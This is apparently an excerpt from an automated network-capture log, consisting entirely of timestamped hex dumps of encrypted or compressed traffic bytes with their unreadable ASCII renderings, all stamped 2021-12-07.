d8 eb 44 1f f4 84 ec fa 4a a6 d2 47 d3 60 bc
                                                                                              Data Ascii: `ASW`q]5\r`vo3?u9zRB!Iiqi# *bj& /Erk@a!wK>_%OHrT}S,?)U*4 Tg=<%j$*LiO4_3\Y,'&fDJG`
                                                                                              2021-12-07 12:39:07 UTC1266INData Raw: 12 cf e9 0d c7 95 d7 2e 09 1b 49 61 e2 e7 36 9a bd 5e 55 f4 09 e5 57 54 eb 9f 45 cc 69 94 01 ff 61 23 97 44 65 18 81 7c 33 36 f0 3f 40 e7 c3 54 56 aa f9 9b 17 ad c6 61 dd 61 47 a3 25 37 62 8c 84 09 9f a1 ab ac ce fd 82 c6 8d 78 23 27 1c d3 c1 5b d8 7f 06 ed 3b 3c 82 91 20 33 64 cf 6c f8 15 7a 41 07 f9 63 1a 94 6d c5 19 62 52 4e 38 e0 df 9c 51 bc 17 79 f1 5f a4 67 70 34 d5 6d 13 c6 17 15 3c 85 88 af e2 3d 74 6e 63 a5 0d d2 d2 99 d2 d7 17 0b 70 79 ac 8d 5c 8b dd e5 14 cb f9 a9 64 cc df f9 3e 50 24 45 e4 fd 15 f7 c6 85 e8 48 93 6a d8 4d e0 ba be f6 89 a9 fc dd ac 81 38 a6 47 74 a9 c2 1f 07 b9 37 1d 8c 1c 8f 4d f3 65 69 3d 3b 1e 3a cf 01 f9 77 06 94 38 bd 19 ab 07 37 4d fd 40 9a ed 3a c3 fa a9 76 6f 15 97 d0 d2 45 a8 c3 4b 3a aa 1b 07 4d 28 6e 89 a1 f1 99 6e
                                                                                              Data Ascii: .Ia6^UWTEia#De|36?@TVaaG%7bx#'[;< 3dlzAcmbRN8Qy_gp4m<=tncpy\d>P$EHjM8Gt7Mei=;:w87M@:voEK:M(nn
                                                                                              2021-12-07 12:39:07 UTC1273INData Raw: 37 69 bb 6b d0 a7 b4 94 41 ed 9e 0b cb a2 19 e8 88 0b be 84 1c f0 bd f0 3f 0f 50 b3 e8 bf e8 5c cf 3a 2b cf d3 84 2f 66 25 a3 14 7d db 08 4f 08 5c 31 80 64 7c 9b 20 74 0f 83 64 e2 80 fd df 8f 58 9e 23 09 a5 e3 01 fe d3 08 b9 88 8e 22 b0 ff 23 69 ec 47 48 91 fe 84 23 90 21 ef cf 52 77 3a 4d 90 61 f9 f6 22 47 8d c2 d7 ff 10 3b 4e f9 6e 9d d3 ee 8f a1 c9 07 93 e8 42 14 e3 d9 e9 41 64 0a 28 82 06 bc 61 8b e1 6a 16 3a 1c 69 8c de 34 f8 71 9b 7a 7e 04 08 e0 1f 55 05 dd 99 cc ae ad 25 3c 90 4b 56 85 26 18 8e 6b b8 8e 08 a4 20 86 39 e9 ba ab eb 21 ba 2f 16 be e9 37 a3 5d bc ee d9 23 e0 ee 5f 13 e9 05 fd ff f8 17 fe 49 2e c4 36 04 17 f6 d7 a3 8b ab e0 65 69 7d 49 e5 30 9e 8c cc 10 43 e6 a8 d0 e0 28 c8 bf e5 fc 38 97 6f fd 6a 91 e9 f5 d2 ff 4c f8 e2 21 f0 91 4a 70
                                                                                              Data Ascii: 7ikA?P\:+/f%}O\1d| tdX#"#iGH#!Rw:Ma"G;NnBAd(aj:i4qz~U%<KV&k 9!/7]#_I.6ei}I0C(8ojL!Jp
                                                                                              2021-12-07 12:39:07 UTC1281INData Raw: e5 ab 6e 2b cd 73 df 7f fe c7 9b fe a0 fb 00 c0 ff bc 9b 4e 6c 6a 2f 88 be 70 94 7b ff 31 3b e9 bf fd 07 1a 19 49 c6 7a ab 22 0d 23 f2 7b c6 5c 83 ed 7c 3c 84 95 16 b2 8b b2 2e 7d a8 4d 22 df 29 43 4f b6 e1 73 90 7f a3 46 26 d3 ce 15 b7 11 4d 63 7b 89 16 0a 6b 4e 6f 72 f2 a6 4a 97 22 aa 34 be 65 6f 46 5e 3d e0 18 e4 ff 02 fe 5f f1 dc 2a cf 55 96 1e 94 6a 59 c9 6f 1d 85 59 b8 84 f7 40 ff e0 17 71 e7 0a f3 d4 f6 ca bf cf aa d5 51 d6 0d ee f5 02 ef 1f fb 4b 18 cc 98 4a 67 f9 1d 13 34 86 3e 67 99 9c 20 ca 22 2f 1c 5a b6 7e 09 ae 02 62 b9 a3 d6 1d e0 7f 04 b9 84 f7 8c 9f 94 7b ac a3 b2 3e 4a d8 e6 ab 14 fd 7c d5 7f 94 13 f4 3c 07 f4 10 31 08 86 37 58 21 d9 3b c2 31 f2 de 0e a7 54 0c 45 83 fc 27 a4 a0 d5 57 ff af 0c 13 36 8e ed 78 03 04 e8 7f fa d3 07 1f 25 6d
                                                                                              Data Ascii: n+sNlj/p{1;Iz"#{\|<.}M")COsF&Mc{kNorJ"4eoF^=_*UjYoY@qQKJg4>g "/Z~b{>J|<17X!;1TE'W6x%m
                                                                                              2021-12-07 12:39:07 UTC1289INData Raw: 18 13 e5 62 22 0c a0 ef 7c 9d 7f c9 eb be d9 07 fc 2f d1 d2 8f e5 b4 4f 8d 9d ad 70 71 67 6f 77 28 c1 f7 4f 57 29 b2 cd ec f0 4e cd 7e 15 06 cf 6c 35 4f f1 d9 76 a8 23 99 3e 64 dd 64 88 96 0a fb 2a 8b 11 17 c6 82 12 0e f5 02 ec 7f 76 ab f4 e8 cd e5 80 ff f5 91 8b 83 a7 e7 ed 33 d4 1b 8d 71 39 4b 49 36 f2 9e 26 83 26 d7 08 43 7b 96 7c 0e e5 9b 43 ff 4d 6b 2d 0d 22 e7 67 f4 3f 60 fe 1d 4f d4 f4 33 28 3a 26 84 34 5e 37 7b d1 2d 7f a2 35 8b 62 a7 64 68 b5 2f 7f 4d 0d e9 ed d7 a0 1d ea 4e ab c5 77 3f 2d d3 80 fe 77 96 f5 ed 6e a8 11 8b 43 91 bb 7c 96 bc 6d 08 9b 12 ee f0 d5 a2 ec ff cb 7f 9a de 8c 14 5d 3c a2 95 c4 09 ce fe d7 b1 cf 07 e6 5f 47 1e eb ad ab 21 43 db 20 ff e3 f9 77 09 6e 45 c7 72 88 96 3a 45 31 3b 5f 58 b8 53 74 1e f0 ff ef bc 81 1a 60 95 c3 cb
                                                                                              Data Ascii: b"|/Opqgow(OW)N~l5Ov#>dd*v3q9KI6&&C{|CMk-"g?`O3(:&4^7{-5bdh/MNw?-wnC|m]<_G!C wnEr:E1;_XSt`
                                                                                              2021-12-07 12:39:07 UTC1297INData Raw: 56 04 16 43 50 88 5a cf 50 85 2d 88 e0 1e 52 a9 d0 79 c3 fe bd 27 d8 ff c8 d0 0e 9c 17 95 b9 a0 1e 01 fe 27 ff af 36 e8 1f 03 86 21 df 33 fd 14 1f 52 df fe 48 cc f6 b2 39 d7 67 96 0f 08 95 86 e1 23 c1 46 d0 13 17 d7 56 34 a8 ed 1d e5 e2 84 7a 99 3d 51 d8 82 16 db 27 ba 2a ed 0e bd 0a 31 3a be cf dc 48 8f ae f8 9f fe 87 48 57 4e 96 bf cf 91 2c ff 79 d4 0e 62 b6 6d 09 c5 fc a2 42 03 1e 9b 03 82 e8 eb b1 b5 5c 86 d2 4e cb 90 a5 57 f3 d7 f4 a4 5d b5 d6 06 16 34 0d 9a 4c 03 5c 27 9b 4f 7e 64 52 44 07 6e 48 7f 7d 62 f4 c7 a2 db 3b 01 ff 89 54 4a a3 c3 52 7a e2 63 c4 30 65 b5 97 ee e4 a6 d5 e8 87 f5 a7 d5 d3 0b e4 47 08 62 50 ff cc 9e 0f b2 02 ef 6d 9f 7e df 82 fa 3f a1 f2 1f ff 96 72 ba 61 f4 47 16 7c eb 99 42 b9 5e da 29 e6 80 ef 55 05 53 92 ef 41 d7 b8 8d 76
                                                                                              Data Ascii: VCPZP-Ry''6!3RH9g#FV4z=Q'*1:HHWN,ybmB\NW]4L\'O~dRDnH}b;TJRzc0eGbPm~?raG|B^)USAv
                                                                                              2021-12-07 12:39:07 UTC1305INData Raw: 9a 38 cb a1 8c fd dc b9 ab c6 e2 61 23 18 53 c7 bb d3 5f 0b f2 3f 32 83 8e 7a 9e d6 6a 28 b7 f4 de 9a 43 26 65 35 49 53 11 69 30 fc 0e 97 25 76 f5 ae ac 3f f8 38 28 5f 68 f2 75 41 02 f8 ff 22 cd 2f 2f 2f 58 bc 8b 6c 41 fe 9d 38 6e 43 c6 89 38 f1 18 25 c5 7f fa 7f 43 e7 e5 83 5e a9 04 51 55 58 1e 57 34 cb b2 8e ce 4c e0 7f 57 57 52 e3 bb 75 dd ec 9f e4 ac c6 41 11 c1 d1 2d 83 44 aa 78 64 c4 e0 14 13 f8 72 b5 36 48 90 50 86 6a 2a 8f 4c ae 82 08 0f f8 ff 4e dd 18 86 de c4 fb 14 d2 11 12 64 5e 96 9e f9 a5 14 b0 24 31 ff 27 ff 7a bd b3 8b 9b 29 fe ad 7e f5 87 56 e2 f7 8a 66 f3 aa df b2 ec 84 05 b5 d9 b3 d4 c7 88 68 4c 4a 87 91 b3 a8 57 d4 88 22 6a d8 be 59 79 a2 72 1b 5d 41 12 41 08 88 10 7b d3 d2 47 ec e7 fb 67 9f ae 53 ee 54 aa c2 4b a3 f6 2e ca 36 57 06 da
                                                                                              Data Ascii: 8a#S_?2zj(C&e5ISi0%v?8(_huA"///XlA8nC8%C^QUXW4LWWRuA-Dxdr6HPj*LNd^$1'z)~VfhLJW"jYyr]AA{GgSTK.6W
                                                                                              2021-12-07 12:39:07 UTC1312INData Raw: 0e 7e f6 f8 46 4d 87 fc ba 0b 43 f1 22 0b 69 fb 3e f9 8c d9 b0 f9 62 10 2f 0d 06 a7 7a 5e fe ba 4b 34 3e 10 e0 df b0 70 66 f3 99 95 e9 77 4b 83 63 c5 15 b0 b3 3f 77 11 e4 db 16 36 fa 43 0c 8d 07 34 c8 87 17 38 bc cd f9 ec e0 8b cd b6 66 9f 37 50 61 ca 7e c0 d8 70 42 59 39 6b c2 85 7a 57 10 99 1f ec 7b 07 01 fd bb 90 47 22 cd ec 5b 2d 7e eb ea 33 da 18 fc c6 37 e9 7a 0e 89 24 89 27 8d cd ca 7f 19 b8 8f 29 eb c9 b9 be b1 26 53 3e c1 0c 2e 75 77 1e 0d 94 90 0d 5a d1 93 51 a1 a5 a9 bb 5d 53 ec 0b a7 8b 9d 21 6a f3 52 77 19 2f 04 97 93 32 bd 81 ea a3 89 5a 53 39 41 85 0b 12 d4 96 17 5d cb 6b 17 53 53 7e cb e0 22 29 07 f4 4f c2 be 33 ad fe 9c 8e f3 44 7e fc c0 04 d9 7f bd ec 8f 55 82 da e0 70 5e 9f a0 4b bc 77 96 24 ed 5e fc b3 56 c7 ba 93 38 65 fe bf fc 17 1a
                                                                                              Data Ascii: ~FMC"i>b/z^K4>pfwKc?w6C48f7Pa~pBY9kzW{G"[-~37z$')&S>.uwZQ]S!jRw/2ZS9A]kSS~")O3D~Up^Kw$^V8e
                                                                                              2021-12-07 12:39:07 UTC1320INData Raw: 15 4d 6e 24 38 10 a1 6e 48 f1 42 0c 2e 3f 22 3f c0 c6 09 2d ed a7 84 7b b2 c3 c6 42 e9 b1 c2 b1 56 76 46 c2 dc c0 cb 4b 9e b4 7a 84 80 22 59 5e 71 a4 14 1b fe 69 18 94 af e8 35 9b bc 05 2a 28 b8 dc a1 40 ff 45 a2 8d de 35 7a cc 0f d4 3f 37 94 fb d0 56 e6 4d b9 9a bc e7 fb 2a 66 3b b3 b8 2f e1 0e 77 1f de b1 7b a6 b8 72 ca 1d 63 ff 46 08 ad f6 b9 ff 6b ac be 03 fc af ad 5f 87 d4 4d 87 07 02 fd 5b 15 79 43 e8 0f 61 22 c2 b6 8a 77 3d 81 91 c0 ff 6e 27 d9 d3 62 de 90 45 e3 25 26 ab 74 76 32 d8 ff 92 36 7f f6 23 19 45 52 c9 ab 0f 05 fc 1f 6c b6 1e b1 70 ce 90 58 b0 ff 76 82 b8 c3 96 20 c1 cc 66 39 80 42 e9 59 79 99 ef cd 18 55 d0 96 f9 ae cb 94 4d 29 fd 5d c1 0b 77 6b b9 68 29 d7 a6 4b bb c8 b5 73 85 89 5d bd 2c 11 92 44 a4 7e 0d 1d 0e 05 bd 49 21 a0 ff ce 5a
                                                                                              Data Ascii: Mn$8nHB.?"?-{BVvFKz"Y^qi5*(@E5z?7VM*f;/w{rcFk_M[yCa"w=n'bE%&tv26#ERlpXv f9BYyUM)]wkh)Ks],D~I!Z
                                                                                              2021-12-07 12:39:07 UTC1328INData Raw: d1 ab 0e 24 1c d9 9c bd f2 5a 64 d3 b0 d4 97 f4 ac 80 ff a8 81 15 02 e2 df 32 f1 0a 7d 50 24 88 7f 95 f5 26 7f 4d df 51 bb f1 fc 4c bb af 02 fa 57 22 e1 29 dc 94 cc f6 df 8f 80 fe 29 db 5c e6 5b 1b 7c 2b a7 ee 15 d2 0f 2a 99 6d 2d 46 e1 cb 16 f6 46 50 56 11 8c 32 4f 36 5d 82 10 fd 27 73 22 f5 b7 2b d9 bc 8d 36 0c 8f 00 ff 44 a8 c7 4e dc 0c e0 ec 75 76 02 fe 9f df bf f8 41 81 fb c7 13 c8 21 e1 4c 7f 5d 40 05 f4 df f4 26 41 fe 23 fd cd a7 08 f1 bf 8d f9 09 58 5f a2 3f c1 fe 5f 59 0c ce e4 a9 54 2e b1 a8 03 13 e0 bf 00 f6 d2 c0 65 c5 d1 e1 d5 ee 61 13 a6 f0 9d d1 16 3e e4 fb b7 5b ef d1 fb f5 6e 9b d5 cd 1d f7 98 e6 22 42 a4 d8 14 9c df 53 a5 70 65 d9 6c 91 d7 12 c9 80 f9 b0 5d 5b c1 27 6a 82 48 fd 0e 01 ee 5b 11 52 75 00 a8 7f 92 b3 13 22 aa 36 9e 0b cd 17
                                                                                              Data Ascii: $Zd2}P$&MQLW"))\[|+*m-FFPV2O6]'s"+6DNuvA!L]@&A#X_?_YT.ea>[n"BSpel]['jH[Ru"6
                                                                                              2021-12-07 12:39:07 UTC1336INData Raw: 0f 9a 0e 93 e9 41 80 ff 3d 97 a5 aa 5b 0b e9 c2 d7 8d 2b f1 80 f3 13 a1 4f 22 de 48 1b cf 7a bf bd 01 fd af 21 b1 3a 04 ff e3 5b b2 bb 6e 82 e4 7f 41 c8 fb 87 36 6b d8 62 f1 64 e6 6a 84 6f fa 0e fc 8f 06 0a 2a 7e 81 fd 67 f2 c8 03 a8 25 d0 ff 9e 88 22 ad e6 e3 ce 7d 00 fc 97 93 5a f0 fe 67 51 e3 41 fe 37 5f fd 6d 4e 03 f8 0f 1c 56 a2 a0 fe 5f 3f d4 08 30 66 31 b1 f4 f6 82 db 07 f1 8f 5d 46 16 e8 7f e2 a7 ef f3 2f cc 14 4c 05 aa 05 a5 53 6b 0d d0 a3 fc 97 ff 6d 6c d0 7f 64 51 29 49 47 83 fe 0f 87 54 09 f8 df f9 3c 94 67 f2 43 f0 4f 66 b3 96 49 65 70 fe 20 3e d8 17 e0 fc 6b 52 77 e3 1b 91 7e 0b 7f 69 af 9a ff dd 7f 3d 98 7f d1 93 02 fc e7 0e 0b bf 2e ae c7 3a ec 16 b9 44 17 dc 7f 55 e5 00 11 71 44 18 1b 84 ff 62 92 ec 56 c6 5b 74 6c 07 ea df d8 79 0c 9b ec
                                                                                              Data Ascii: A=[+O"Hz!:[nA6kbdjo*~g%"}ZgQA7_mNV_?0f1]F/LSkmldQ)IGT<gCOfIep >kRw~i=.:DUqDbV[tly
                                                                                              2021-12-07 12:39:07 UTC1344INData Raw: f5 d2 40 ff 47 8f 08 f2 7f a9 0a ef 2b 71 d6 1f c9 74 0c eb 8e ed 6b 7d 6a 44 4f dd 9d 9a fb b2 df 6e c2 5b e5 4b 3a ff 0c 99 45 e6 df e3 ad 9f b5 78 6b 5b 39 27 96 31 1f ca f9 6c d0 9c ef 02 ff 3f e2 07 10 ff 29 3f 07 22 60 9e 36 cb be 76 a0 fe d1 bd 53 b7 38 2f 7c 4d 2e a0 00 fc 9f 72 ca 53 16 d4 f6 dd 2e e8 dc 27 6b 50 6a d0 92 79 44 af c5 e7 1b eb c9 df bd b3 de 8b b5 1c b9 25 b0 92 ad 6a 84 fe d3 e2 c7 d8 ee b5 4c 8e cc 99 b9 eb 2c c9 81 f2 e2 25 32 9c 3a 63 73 45 df 97 fd f8 36 29 d0 ff 7d 74 b9 ee 5c 21 da 48 49 2c 54 a1 03 fd 1f 3c 79 69 60 d7 a8 d8 c6 5d bc ed db e2 e0 81 22 3e 37 8a 03 a4 9d dd 8a 15 72 73 72 55 eb d5 61 a0 7f af 12 9d da e7 16 8f 7a 36 4d 8d 87 6c 7e ef f3 67 d7 e4 10 8a eb 56 44 e5 84 c8 8e ca a3 90 ca 12 bd 41 af 1b df bb 39
                                                                                              Data Ascii: @G+qtk}jDOn[K:Exk[9'1l?)?"`6vS8/|M.rS.'kPjyD%jL,%2:csE6)}t\!HI,T<yi`]">7rsrUaz6Ml~gVDA9
                                                                                              2021-12-07 12:39:07 UTC1352INData Raw: f2 bb 58 bd 3b 45 5a 4b 2e 10 af 0a 48 90 ca 17 e9 44 d3 11 00 fc 87 dc ee 42 0c 43 bf a1 09 69 c5 c1 ac ad 7b 6d 38 fa eb 7a 1b 97 1e 24 05 d7 0e e9 74 0c 23 4f 87 3a 53 7b 6f bd 5e 90 ff cb 03 05 8d d6 d3 66 de a7 ae f9 c8 af 1d d4 bd 45 4a 55 08 b6 82 6f f9 37 3e 95 79 0e b3 6f e8 fe be 4b b7 b9 b0 96 a0 6a 31 d2 eb 0d 77 4f 0f 46 99 c2 0c 8c 48 0e b5 aa 1f e6 45 d1 ff 37 7e d8 f8 fb db e9 87 aa 37 e0 fc 17 ac a6 32 97 9a 41 f6 ad 7c 58 d6 f1 e7 53 19 aa db 56 6f a3 05 f9 28 db 88 81 a6 b0 79 46 6c 8e e9 8d 32 f8 fe b5 0b 78 b6 b5 38 bf 1d 9e 22 ec bc e7 9c 36 cd d1 99 7b 1e 44 31 e2 e9 da 63 ab 14 0b ed 28 f6 ec d6 27 b4 4d 2c ed 28 de 6a 70 44 70 c6 a1 f9 cb d9 26 ae c1 51 7b 7b d6 32 e0 a5 3f 6e 26 ec ab 13 6d a5 e8 39 d0 f1 47 a5 2c 9e f6 69 b4 91
                                                                                              Data Ascii: X;EZK.HDBCi{m8z$t#O:S{o^fEJUo7>yoKj1wOFHE7~72A|XSVo(yFl2x8"6{D1c('M,(jpDp&Q{{2?n&m9G,i
                                                                                              2021-12-07 12:39:07 UTC1359INData Raw: f0 e1 75 95 e5 c4 7c d6 cd f7 74 2c 03 fd 27 bf ec 0c ac 17 f3 24 3b 0d b9 a4 0b 95 6a a9 78 0d 86 a8 2e ad a1 d5 aa 7c 5e a3 ee a2 4c 3a b8 82 5a 4c cc e5 58 88 da 7e 8c 05 a8 0c 04 2c 65 f0 24 db cb ed 47 d5 b1 b7 7d 5f ea 75 13 56 28 3d 91 12 93 f9 b9 ed 9f 91 31 bf 3f d2 10 f6 ae 5f 40 3e be 17 cf 94 b0 4c 2c f0 82 ba 2b 1a 7f ff ff cf bf fb 8f 59 ba c0 fe 8c e5 5f 01 83 70 ec a2 1e 6c 2b 7d 06 05 6e bf e4 e5 17 0a e6 50 71 c2 05 3e 77 4e 6b 9a 84 6e 03 5f c0 3f 28 88 e1 43 e6 9e e9 73 e2 0a 67 df 28 8a 8b 2a 1d 65 ee b7 f9 91 a9 e8 2a d2 5d 27 12 02 fa 8f d5 42 6e 7c 8e c6 f9 c8 88 8c 93 24 ef ee be 68 12 69 eb ea 91 2c 01 fe 4d a6 7e 42 01 f6 d9 f6 4c 22 2e 76 57 84 5f 83 93 b3 7f 18 56 1a 09 aa df 1a ef 99 86 f6 dd f8 21 72 7b 6d f1 a9 bd 40 d7 d7
                                                                                              Data Ascii: u|t,'$;jx.|^L:ZLX~,e$G}_uV(=1?_@>L,+Y_pl+}nPq>wNkn_?(Csg(*e*]'Bn|$hi,M~BL".vW_V!r{m@
                                                                                              2021-12-07 12:39:07 UTC1367INData Raw: 60 27 39 6d d4 4b 05 c9 40 b7 11 52 4e 73 71 c1 37 6e 59 d1 ff 75 ff 71 d3 db d2 c6 71 0d 7b 0b 8f 77 cd 21 ca 9b 7a b0 17 bf d7 a5 c4 31 88 b7 da 81 27 23 21 9c 57 65 1b ef af 22 74 8c 13 c4 25 3e 8a 98 ae 90 4b b4 bc d1 7a 3b 8d 0e f2 ef 98 82 32 11 0a a4 d5 f8 67 d6 aa ed f9 92 b1 ca 75 b1 af fe a3 52 7d 8f c1 a4 23 ca e2 b9 03 fb c0 b1 ce 81 a0 ab 70 ef 5d dd 1f 6d 2d de 7f 76 c4 8f 6a 85 51 cc be ed f9 fd d1 a7 9a fc ce 16 2e 89 2a 02 1b 33 f7 51 dd fd e9 e5 6c 67 25 d3 00 cf 0f 7b c5 9b 68 0d 99 a0 0c 7e 4e aa 5f dd f4 32 f3 8f 86 5a dd 6f 4f bc 78 4a 3e 34 1d 0f fc 79 29 5f 47 c3 01 d1 62 c3 0b 95 44 db c8 69 82 ae 6f 04 02 b1 6f 4d 54 ca 58 fe bc 7b 17 e1 23 3b a6 d6 cb 19 30 c9 b0 60 6b 9a 9e 0f d9 3f 33 95 38 31 61 ea 75 f9 a7 3c 31 4f f7 6a 61
                                                                                              Data Ascii: `'9mK@RNsq7nYuqq{w!z1'#!We"t%>Kz;2guR}#p]m-vjQ.*3Qlg%{h~N_2ZoOxJ>4y)_GbDiooMTX{#;0`k?381au<1Oja
                                                                                              2021-12-07 12:39:07 UTC1375INData Raw: 35 f3 50 b1 f5 4e 60 4f d2 71 22 91 37 93 a1 b2 fd d5 7f 0b bf bd bd d7 0c 97 60 65 76 c3 af 68 42 9b d5 f4 fa fe 6f 02 e7 5f 89 ea d9 c9 8a 78 cf 9a 63 2d 48 d0 7f 89 80 7a 33 98 b2 07 77 80 bc c7 12 36 7e 0a f8 47 1f 2c 93 4b f6 40 7c 2e 4f c0 bc f6 5b 83 6b cb ae ab cd 0f 1f a5 4c f3 c3 c4 e3 d8 58 d9 f3 7f 4a fd 03 e3 9f 97 eb 23 0e 92 7b 2f 95 9c 08 9a a9 89 7b 4e d1 05 ba 06 f0 20 c7 f2 bc 64 78 61 a2 be a0 f6 1a b4 35 0d 6e e4 0e c8 2b e5 83 fd 8f be 21 45 1a 95 57 d1 58 ef a4 bf 6a 53 80 2f cf 96 5f 2d 34 02 13 1b a9 b0 4f 79 b2 55 cb 4b 59 5c a9 ea c2 c9 d0 3a e3 12 12 07 ff d0 2f f3 9c a8 b9 e4 52 91 41 c1 4b 6f 7d 37 a5 d2 22 d1 a3 b3 cd c7 b7 c1 3a 7b a1 59 5c 17 9e ba c5 44 27 73 a3 76 3d 05 c0 7f 94 98 0f 33 24 33 ca ad 1b bc 4f 69 8f c8 dc
                                                                                              Data Ascii: 5PN`Oq"7`evhBo_xc-Hz3w6~G,K@|.O[kLXJ#{/{N dxa5n+!EWXjS/_-4OyUKY\:/RAKo}7":{Y\D'sv=3$3Oi
                                                                                              2021-12-07 12:39:07 UTC1383INData Raw: 85 61 c3 92 5a 83 93 31 3e c8 9e b3 f9 2f ff 3d 9f 0c 99 8b 43 66 ce dd 63 63 bf 30 0d f6 9f fd a1 1d 51 9c d4 4e 21 ab d5 d4 b9 94 cd dd d3 9f 52 47 6c ec fe ec 01 ff 43 2c 8a 1d e3 2f 38 5d b4 94 6d 4c 30 ff 7c de ff d1 3c 45 1f 87 9a 60 f8 69 54 0a 16 3b 8a 59 17 63 19 a2 34 bb dc cf 08 d1 30 de bb df ed 1a a9 87 61 28 ac 64 e9 76 f2 94 09 c2 77 ee a2 90 6c 5b 4f a8 76 1b 86 e7 83 e9 da 4a 28 04 a1 64 d3 42 2a 57 e6 5d bc bb da f7 21 99 21 07 92 29 d4 e5 6c 0f 54 fe c4 59 93 bf 2b ca e1 b2 5f e4 7e bf bf 8c 63 d2 62 b7 66 3b 93 ed bd eb bd e5 c3 4c 54 dd 18 dc a4 01 fe 1b c5 9f c7 7b 32 25 ab 46 6f e4 8d b3 aa 12 0c e9 2d 02 5c 5b f2 ac 3b d2 2a af 63 03 2f e2 79 08 28 00 ff 4f d8 0d ce b6 06 bf b3 d2 a4 ef df 5b cb f0 9e 61 f1 4f f0 ea 9a e7 de 0c ff
                                                                                              Data Ascii: aZ1>/=Cfcc0QN!RGlC,/8]mL0|<E`iT;Yc40a(dvwl[OvJ(dB*W]!!)lTY+_~cbf;LT{2%Fo-\[;*c/y(O[aO
                                                                                              2021-12-07 12:39:07 UTC1391INData Raw: af 4c c6 e8 26 59 58 81 7a 6f 0f 72 15 05 47 2c b5 ed c2 14 94 b5 07 b3 7d 2d ee 58 d4 f0 08 bb 37 db 8f eb 24 87 62 d8 07 73 90 7f 42 a1 53 29 17 8e a8 9d e1 c4 a6 ec f6 e6 7e 7c 13 19 d6 cc 0e 43 3b fc fa ff e7 b9 d1 8a 89 b2 91 e7 24 da 39 1b 64 f5 7f 7f ff b4 93 49 8e 38 ed 7f f6 bb ea 8b 0b 7a ab e3 48 59 76 37 cf 95 8a 44 57 4f 62 d0 1e 32 d2 ed a5 77 fc 6b e3 87 6b bc 8c 62 4d da 64 e8 2f a4 8f 62 bf 49 be 5f 01 f7 7f a3 ba a3 6f 80 7f 02 fd 38 bc 46 8f bf 8c 5d c1 a4 82 32 c5 a3 5c 3e 67 8c 88 14 71 5f b0 f8 8b c0 f4 ce 4c b1 50 12 e6 a3 fd 62 05 e9 1a 0a 0e 49 d9 21 d6 a1 bf 75 b7 80 8a c5 de e2 0f 45 67 cf 9b a6 4b cf 8a 20 1d 7b 03 a7 01 01 ed 44 88 33 27 55 48 ce 69 ee 9c 51 c5 b2 33 e5 03 b2 42 4a 95 aa 1b 2d 52 85 e8 31 57 f2 94 98 cf c0 ff
                                                                                              Data Ascii: L&YXzorG,}-X7$bsBS)~|C;$9dI8zHYv7DWOb2wkkbMd/bI_o8F]2\>gq_LPbI!uEgK {D3'UHiQ3BJ-R1W
                                                                                              2021-12-07 12:39:07 UTC1398INData Raw: 1c 7b 47 89 91 76 8a 16 d8 4d c8 a4 52 97 91 f8 7b c8 d1 8c 5a 29 c1 9c 89 68 8b 4c bc 0e e6 f3 20 83 12 c6 48 57 39 2a 64 3f e3 1b 23 6b a5 4f 3f 22 80 ff e8 19 3b fd f6 97 b5 f5 ac 08 d8 7f 79 95 86 d2 17 73 9e 3c b1 4b f9 73 31 a9 77 95 13 6f cb d0 0e 34 b5 08 36 70 9d 97 54 09 19 e7 87 49 e0 89 fc c4 a5 7c ed bf ca ac a5 35 ed 1a 0f d3 7e 10 23 a0 62 80 0d fd e6 ec ff 7e 52 72 fe be 55 22 7e 77 41 69 a9 3b 08 f9 a1 e6 a4 af 48 ea 35 ff 9e 04 b7 79 c4 bd ff 7e a8 26 0b ec 3f 54 1f b3 1f 04 bd ea 57 3b 44 f2 f5 89 ab be 20 a4 9d ef 7e b2 bb 2c 24 b2 57 25 62 d9 bd 0d 6a f9 fa 96 e4 23 9a e2 92 e5 53 8a 40 a1 5f 80 8d e1 bc e7 71 2a 03 8b ca a9 9a 9f bb 60 a2 a4 2e 59 b6 42 7b cd 1b 5f ba a7 4e 49 f3 a9 3a ae 7f e7 01 11 88 6f 05 29 1e b4 13 91 18 19 6a
                                                                                              Data Ascii: {GvMR{Z)hL HW9*d?#kO?";ys<Ks1wo46pTI|5~#b~RrU"~wAi;H5y~&?TW;D ~,$W%bj#S@_q*`.YB{_NI:o)j
                                                                                              2021-12-07 12:39:07 UTC1406INData Raw: e4 5f 6b 8b 97 c1 fb 5f f4 7c ab 40 a7 bc ef 70 f1 fd ca 51 ad 32 21 79 3a 1e 37 d8 cc f6 5a f9 d1 70 05 79 2d bb a3 89 c0 81 fc ef 82 36 dd be e8 69 9b 9b 29 34 f4 da 10 cd 00 f4 ea 14 cf b9 ce 67 a2 c7 c5 37 87 95 87 ab cc ee c5 6f 4e bb 7d e7 6c c1 f3 1f 99 73 78 b3 fd 59 35 45 6a c7 d9 9a 94 14 2e c1 1f 4c 92 a5 3f 81 48 d7 32 e8 68 71 cd d3 db a3 d5 c2 5b 7b fd fd 07 0c da 90 cf 99 59 ca 4c fd f1 2a 7c 2a 92 ed f9 ca b8 17 a2 a5 e7 3e 32 94 ba c9 20 d3 79 57 bd 70 fb 96 cb 82 8a 1a 2a dd be c6 fa 9e 8b 82 63 ab ad 44 b9 ed 11 d5 a3 12 eb 73 fa 16 06 87 a5 1b e8 ff 03 ff 87 71 a7 f2 ea 52 15 f1 bf 8d 63 2d 55 dc 20 e3 f7 ae cc 7d 6d 0a e0 ff ef a1 e2 95 7f b2 2f 85 58 d3 07 2d c9 d2 05 fb ca 3f 88 8b 74 20 71 fa 40 55 b7 14 51 24 8c bb d9 d4 fc 67 11
                                                                                              Data Ascii: _k_|@pQ2!y:7Zpy-6i)4g7oN}lsxY5Ej.L?H2hq[{YL*|*>2 yWp*cDsqRc-U }m/X-?t q@UQ$g
